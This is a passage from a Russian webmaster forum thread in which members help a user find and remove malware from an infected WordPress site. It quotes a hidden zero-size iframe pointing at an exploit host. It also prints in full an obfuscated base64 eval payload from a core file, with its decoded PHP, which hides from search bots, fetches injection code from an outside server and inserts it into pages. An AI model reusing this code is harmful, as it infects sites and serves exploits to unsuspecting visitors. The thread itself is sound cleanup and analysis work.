Перейти к содержимому


Конкурс "Лучший отзовик"
× Быстрый вопрос
Пользователь месяца
ShowPrint ShowPrint 1-й за Март
Очков активности: 1 152 1 тема, 61 сообщение, 12 баллов репутации
Сайт: ShowPrint.ru
ТОП самых активных за этот месяц
  • Фотография Андрей WPMasterKZ
    #1

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 1008 Вне конкурса за определение пользователя месяца

  • Фотография OlgaGetman
    #2

    OlgaGetman
    Очков активности: 483 Вне конкурса за определение пользователя месяца

  • Фотография Vmir
    #3

    Vmir
    Очков активности: 430.5 3 темы, 32 сообщения, 7 баллов репутации

  • Фотография Mandarin
    #4

    Mandarin
    Очков активности: 246 7 тем, 20 сообщений, 4 балла репутации

  • Фотография ShowPrint
    #5

    ShowPrint (ShowPrint.ru)
    Очков активности: 204 Вне конкурса за определение пользователя месяца

  • Фотография maxnik
    #6

    maxnik (konovalovpavel.ru)
    Очков активности: 72 1 тема, 21 сообщение, 2 балла репутации

  • Фотография pozitron123
    #7

    pozitron123
    Очков активности: 67.5 3 темы, 6 сообщений, 3 балла репутации

  • Фотография Megoydagi
    #8

    Megoydagi
    Очков активности: 63 1 тема, 18 сообщений, 2 балла репутации

  • Фотография re-search
    #9

    re-search
    Очков активности: 49.5 7 тем, 12 сообщений, 1 балл репутации

  • Фотография Constantine
    #10

    Constantine
    Очков активности: 39 4 темы, 14 сообщений, 1 балл репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 20.04.2019
  • Яндекс выдача: 21.04.2019
Топ 5 участников по репутации


С сайта поперли вирусы (стр. 2)

#21 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0
0

Отправлено 09 Февраль 2011 - 13:14

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.
  • 0

#22 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 13:25

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Естественно, это понятно: реальные скрипты

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Отправил - заранее огромнейшее спасибо!!!
  • 0

#23 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 15:53

softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ.
Ничего подозрительного не нашел.

На данный момент у меня антивирус не ругается на Ваш сайт.
У Вас есть сейчас сообщения о вирусе, блокировка сайта?
  • 0

#24 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:01

softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе.
Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его.
Либо произвели еще какие-либо действия.

Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. ;)
  • 0

#25 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:04

есть вирус ;) ты хостеру писал?
  • 0

#26 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:09

есть вирус ;) ты хостеру писал?



Да, действительно, сейчас повторно зашел и началось
  • 0

#27 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:15

Вот собственно лог журнала:

09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.
  • 0

#28 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:24

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?
  • 0

#29 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 23:13

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!
  • 0

#30 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 07:52

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!



Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...
  • 0

#31 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 08:29

Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...


Сегодня проверю еще весь твой архив, вместе с плагинами. Возможно там где сидит основной код, который "долбит" тему.
Наверняка в зашифрованном виде.
Но уже проще, мы знаем результат его работы, что именно искать.

Но кода вируса в РНР я не нашел!


Я уже на это и не расчитывал когда писал P.S. , не все так просто.
  • 0

#32 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:31

Открой вот этот файл \wp-includes\link-template.php

Найди:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInpveGdf
cm9kIikgJiYgIWZ1bmN0aW9uX2V4aXN0cygiZW1wcl9heGYiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJx
b
2d1bV9ubmMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJiZiJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJ
F
9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3
M
oc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2U
g
JiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikg
P
T09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsidHBrIl0pICl7JEdMT0JBTFNbImJiZiJdID0gMTtzZ
X
Rjb29raWUoInRwayIsIDEsIHRpbWUoKSszNjAwKjI0KjEsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb2
4
gZW1wcl9heGYoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICA
g
ICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAg
I
CAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgI
C
AgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgIC
A
gICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMik
p
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsg
J
HVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmO
C
ApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IE
B
zdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICA
g
ICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7
D
QogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNoc
i
gwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgIC
A
gaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICA
k
c2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3pp
c
CA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgI
C
AgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgIC
A
gICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0
N
CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAg
I
GZ1bmN0aW9uIHFvZ3VtX25uYyggJHVybCApIHsNCg0KLyogICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzK
C
JjdXJsX2luaXQiKSkNCiAgICAgICAgew0KICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCi
A
gICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICA
g
ICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7DQogICAgICAgICAgICAk
Y
3VybF9yZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQogICAgICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7D
Q
ogICAgICAgICAgICBpZiAoJGN1cmxfcmVzdWx0KSByZXR1cm4gJGN1cmxfcmVzdWx0Ow0KICAgICAgIC
B
9DQoNCiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICA
g
ICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAg
I
CAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNC
i
AgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVC
A
kdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1s
i
aG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxy
X
G4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCwgJGVycm5vL
C
AkZXJyc3RyLCA1KTsNCiAgICAgICAgaWYgKCEkZnApIHJldHVybiBmYWxzZTsNCiAgICAgICAgQGZwdX
R
zKCRmcCwgJHF1ZXJ5KTsNCiAgICAgICAgQHNvY2tldF9zZXRfdGltZW91dCAoJGZwLCA1LCAwKTsNCiA
g
ICAgICAgJHNfcmV0Y29kZSA9IEBzdWJzdHIgKEBmZ2V0cyAoJGZwLCA0MDk2KSwgOSwgMyk7DQogICAg
I
CAgIGlmICgkc19yZXRjb2RlezB9IDw+ICIyIikge3JldHVybiBGQUxTRTt9DQogICAgICAgIHdoaWxlI
C
ghIEBmZW9mICgkZnApKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoIlxyXG4iID09PSBAZmdldH
M
gKCRmcCwgNDA5NikpIHticmVhazt9DQogICAgICAgIH0NCiAgICAgICAgJHNvY2tldF9yZXN1bHQgPSA
i
IjsNCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpIHsNCiAgICAgICAgICAgICRzb2NrZXRfcmVz
d
Wx0IC49IEBmZ2V0cyAoJGZwLCA0MDk2KTsNCiAgICAgICAgfQ0KICAgICAgICBAZmNsb3NlKCRmcCk7D
Q
ogICAgICAgIGlmICgkc29ja2V0X3Jlc3VsdCkgcmV0dXJuICRzb2NrZXRfcmVzdWx0Ow0KICAgIH0NCi
A
gICBmdW5jdGlvbiB6b3hnX3JvZCgkZW5mKXtnbG9iYWwgJGloZGVnX2J2ZztyZXR1cm4gcHJlZ19yZXB
s
YWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9k
e
T4pI2lzIiwgIiQxIiAuICRpaGRlZ19idmcsIGVtcHJfYXhmKCRlbmYpLCAxKTsNCiAgICB9JGloZGVnX
2
J2Zz1xb2d1bV9ubmMoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMMmRqYjNWdWRHVnlMbU51TDJsdVptOH
V
jR2h3IikgLiAiP2k9IiAuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKTtAcHJlZ19tYXRjaCgiIzxvcGV
u
PiguKik8L2Nsb3NlPiMiLCAkaWhkZWdfYnZnLCAkbWF0Y2hlcyk7JGloZGVnX2J2Zz0gaXNzZXQoJG1h
d
GNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGloZGVnX2J2ZykgIG9iX3N0YXJ0KCJ6b3hnX
3
JvZCIpO30="));


Попробуй удалить этот кусок кода.

Сейчас еще попробую расшифровать эту хрень, для 100% уверенности.
  • 0

#33 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:40

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.

if(function_exists("ob_start") && !function_exists("zoxg_rod") && !function_exists("empr_axf") && !function_exists("qogum_nnc") && !isset($GLOBALS["bbf"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["tpk"]) ){$GLOBALS["bbf"] = 1;setcookie("tpk", 1, time()+3600*24*1, "/");			function empr_axf($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}

function qogum_nnc( $url ) {

/* if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}

if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */

$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zoxg_rod($enf){global $ihdeg_bvg;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $ihdeg_bvg, empr_axf($enf), 1);
}$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $ihdeg_bvg, $matches);$ihdeg_bvg= isset($matches[1]) ? $matches[1] : "";if ($ihdeg_bvg) ob_start("zoxg_rod");}

  • 0

#34 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:01

Еще в теме e-storage-plus есть три больших вхождения eval(base64_decode
Но не думаю что они работают, тема активирована другая. Можешь удалить ее, все равно не используешь.
  • 0

#35 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 10 Февраль 2011 - 12:03

данный кусок кода подключает http://gcounter.cn/info.php и отсюда идет атака
  • 0

#36 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:04

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.


Удалил - все работает!
Но поступил проще: скопировал этот файл с другого своего сайта!
СПАСИБО ОГРОМНЕЙШЕЕ!!!!!!!!!
ПРОСТО НЕ ЗНАЮ - КАК БЛАГОДАРИТЬ!!!!!!!!!!
ПИВО ПРИ ВСТРЕЧЕ - ГАРАНТИРУЮ!!!!!!!!!!!!!
  • 0

#37 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:12

данный кусок кода примитивно подключает http://gcounter.cn/info.php


По этому адресу и есть вирус.
То есть работал он получается в несколько этапов.
Вначале подгружал http://gcounter.cn/info.php, а с него уже брал код вставки в исходник.
<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Вполне возможно, что данный код еще и менялся постоянно, или исчезал на время, отследить тяжело.

Короче нормальную хрень ты подхватил! ;)
Я с таким, до этого не сталкивался, обычно вирус тупо прописывался в файлы шаблона.
  • 0

#38 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:27

Причем URL http://gcounter.cn/info.php зашифрован дважды.
$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw")


Красивый вирусняк такой. ;)
  • 0

#39 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:22

Сообщение 33 , код посмотрите уже расшифрованный в конце.
  • 0

#40 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:25

А почемы вы решили что дважды?


Я другое никак не пойму: а почему дата файла не поменялась?! Я ж все искал в соответствии с инструкциями Яндекса: смотри по датам изменения файлов! А они не поменялись - как такое возможно?
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru